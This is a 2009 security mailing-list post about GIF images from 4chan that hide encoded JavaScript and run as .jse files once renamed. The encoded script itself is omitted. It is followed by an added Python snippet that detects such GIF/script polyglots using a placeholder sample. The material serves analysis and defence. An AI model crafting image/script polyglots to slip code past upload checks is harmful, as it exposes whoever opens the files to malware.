PaulDotCom mailing list archives
Obfuscated Javascript in a JSE in an Image
From: irongeek at irongeek.com (Adrian Crenshaw)
Date: Sat, 7 Feb 2009 15:56:23 -0500
Ok, I found these images on 4chan that have encoded javascript in them, you have to save the gif as a jse to run them (but don't!!!, I'm just uploading the images to a forum so you can see what they are). Exactly how is this encoded, and can anyone tell what it does? This seems to be the script part:

GIF89aI = "x1!??"; [encoded script body omitted]

If you want to see the gifs in question, look at this post:
http://www.binrev.com/forums/index.php?showtopic=40285&hl=

Adrian
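A defensive check for the kind of file described in the post, as an added example that is not part of the original message: it flags data that starts with GIF magic bytes and also carries an encoded-script (`.jse`) envelope between the `#@~^` and `^#~@` markers, without decoding the payload. The envelope layout (8-character base64 little-endian length field, body, 8-character base64 checksum field) is an assumption taken from how public Script Encoder decoders read it; the function names and the sample bytes are constructed for illustration.

```python
import base64
import re
import struct

GIF_MAGICS = (b"GIF87a", b"GIF89a")
START, END = b"#@~^", b"^#~@"   # envelope markers visible in the posted script


def length_field(n):
    """Encode a 32-bit little-endian integer as an 8-character base64 field."""
    return base64.b64encode(struct.pack("<I", n))


def inspect_gif_polyglot(data):
    """Return a finding dict for GIF-magic data holding an encoded-script
    envelope, or None when the data is not a GIF or has no start marker."""
    if not data.startswith(GIF_MAGICS):
        return None
    start = data.find(START)
    if start < 0:
        return None
    try:
        raw = base64.b64decode(data[start + 4:start + 12], validate=True)
        declared = struct.unpack("<I", raw)[0]
    except (ValueError, struct.error):
        declared = None          # malformed or truncated length field
    end = data.find(END, start + 4)
    # Assumed layout: body sits between the length field and the checksum field.
    actual = end - (start + 12) - 8 if end >= 0 else None
    return {
        "offset": start,
        "declared_length": declared,
        "actual_length": actual,
        "length_consistent": declared is not None and declared == actual,
        # Heuristic: a real GIF has binary width/height after the magic; text
        # followed by "=" means the header also parses as a script assignment.
        "header_is_assignment": re.match(rb"GIF8[79]a\w*\s*=", data) is not None,
    }


# Constructed sample: not a real encoded script, only the envelope shape.
BODY = b"CONSTRUCTED-PLACEHOLDER-BODY"
SAMPLE = b'GIF89aI = "x";' + START + length_field(len(BODY)) + BODY + length_field(0) + END

if __name__ == "__main__":
    print(inspect_gif_polyglot(SAMPLE))
```

A hit with `header_is_assignment` set is a strong signal that an image upload was built to run under Windows Script Host once renamed, so it is worth quarantining regardless of whether the length check passes.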